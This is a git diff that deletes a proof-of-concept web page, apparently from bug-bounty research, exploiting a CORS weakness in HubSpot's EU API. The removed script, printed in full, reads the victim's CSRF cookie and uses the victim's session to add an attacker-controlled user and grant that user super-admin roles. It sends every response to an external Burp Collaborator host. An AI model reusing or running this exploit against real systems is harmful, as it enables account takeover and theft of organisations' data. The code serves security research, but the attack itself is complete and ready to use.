--- a/index.html
+++ b/index.html
@@ -4,158 +4,6 @@
     <title>CORS 3-Step Exploit with Exfiltration</title>
   </head>
   <body>
-    <h1>CORS Exploit with Exfiltration</h1>
-    <button onclick="runExploit()">Run Exploit</button>
-    <pre id="log"></pre>
-    <script>
-      // Extract 'csrf' cookie value
-    //   const csrfToken = document.cookie
-    //     .split('; ')
-    //     .find(row => row.startsWith('hubspotapi-csrf='))
-    //     ?.split('=')[1];
-
-      function log(msg) {
-        document.getElementById("log").textContent += msg + "\n";
-      }
-
-      function getCsrfToken() {
-        return document.cookie
-            .split('; ')
-            .find(row => row.startsWith('hubspotapi-csrf='))
-            ?.split('=')[1];
-      }
-
-
-      // Send exfiltrated data to Burp Collaborator
-      function exfil(stage, data) {
-        fetch("https://lj8nauln75agwganhs9ip0uwxn3dr2.oastify.com", {
-          method: "POST",
-          mode: "no-cors", // prevents CORS issues for sending data out
-          body: JSON.stringify({
-            stage: stage,
-            data: btoa(unescape(encodeURIComponent(data))) // base64 encode
-          })
-        });
-      }
-console.log("All cookies:", document.cookie);
-function runExploit() {
-  console.log("All cookies:", document.cookie);
-  const xhr1 = new XMLHttpRequest();
-  xhr1.open("GET", "https://app-eu1.hubspot.com/api/accounts/v1/basic-accounts/pinned", true);
-  xhr1.withCredentials = true;
-  const token1 = getCsrfToken();
-  xhr1.setRequestHeader("Content-Type", "application/json");
-  xhr1.setRequestHeader("X-Hubspot-Csrf-Hubspotapi", token1);
-  console.log(token1)
-  if (token1) {
-    xhr1.setRequestHeader("X-Hubspot-Csrf-Hubspotapi", token1);
-    console.log(token1)
-  }
-
-
-  xhr1.onreadystatechange = function () {
-    if (xhr1.readyState === XMLHttpRequest.DONE) {
-      log("[+] Step 1 - GET portal info response:");
-      log(xhr1.responseText);
-      exfil("step1-get-portal-info", xhr1.responseText);
-
-      let portalId = null;
-      try {
-  const json = JSON.parse(xhr1.responseText);
-  portalId = json.basicAccounts?.[0]?.id
-  log(`[+] Extracted portalId: ${portalId}`);
-} catch (e) {
-  log("[-] Failed to parse portalId: " + e.message);
-  return;
-}
-console.log(portalId)
-      if (!portalId) {
-        log("[-] No portalId found.");
-        return;
-      }
-
-      // Step 2: POST add user
-      const xhr2 = new XMLHttpRequest();
-      const postUrl = `https://app-eu1.hubspot.com/api/app-users/v1/users/add/bulk?portalId=${portalId}`;
-      xhr2.open("POST", postUrl, true);
-      xhr2.withCredentials = true;
-      xhr2.setRequestHeader("Content-Type", "application/json");
-      const token2 = getCsrfToken();
-      if (token2) {
-        xhr2.setRequestHeader("X-Hubspot-Csrf-Hubspotapi", token2);
-        console.log(token2)
-      }
-      
-console.log("hello");
-      const userData = {
-        users: [{ email: "dangerhm+3@wearehackerone.com" }],
-        seatNames: ["service-professional-trial"],
-        teamId: null,
-        secondaryTeamIds: [],
-        sendWelcomeEmail: true,
-        forceWelcomeEmail: true,
-        roleNames: [/* roles omitted for brevity */]
-      };
-
-      xhr2.onreadystatechange = function () {
-        if (xhr2.readyState === XMLHttpRequest.DONE) {
-          log("\n[+] Step 2 - POST add user response:");
-          log(xhr2.responseText);
-          exfil("step2-post-add-user", xhr2.responseText);
-
-          let userId = null;
-          try {
-            const resp = JSON.parse(xhr2.responseText);
-            userId = resp.id || (resp.user && resp.user.id) || (Array.isArray(resp) && resp[0] && resp[0].id);
-          } catch (e) {
-            log("[-] Failed to parse user ID from step 2.");
-            return;
-          }
-
-          if (!userId) {
-            log("[-] No user ID found in step 2 response.");
-            return;
-          }
-
-          // Step 3: PUT user permissions
-          const xhr3 = new XMLHttpRequest();
-          const putUrl = `https://app-eu1.hubspot.com/api/app-users/v1/users/permissions-and-seats/bulk?portalId=${portalId}`;
-          xhr3.open("PUT", putUrl, true);
-          xhr3.withCredentials = true;
-          xhr3.setRequestHeader("Content-Type", "application/json");
-          const token3 = getCsrfToken();
-          if (token3) {
-            xhr3.setRequestHeader("X-Hubspot-Csrf-Hubspotapi", token3);
-            console.log(token3)
-          }
-
-          const putData = [{
-            userId: userId,
-            roles: [
-              "sequences-write", "buyer-intent-viewer", "core-seat-base",
-              "sequences-bulk-enroll-write", "super-admin", "service-professional"
-            ],
-            seatNames: ["service-professional-trial"]
-          }];
-
-          xhr3.onreadystatechange = function () {
-            if (xhr3.readyState === XMLHttpRequest.DONE) {
-              log("\n[+] Step 3 - PUT update response:");
-              log(xhr3.responseText);
-              exfil("step3-put-settings", xhr3.responseText);
-            }
-          };
-
-          xhr3.send(JSON.stringify(putData));
-        }
-      };
-
-      xhr2.send(JSON.stringify(userData));
-    }
-  };
-
-  xhr1.send();
-}
-    </script>
+    <h1>hello </h1>
   </body>
 </html>
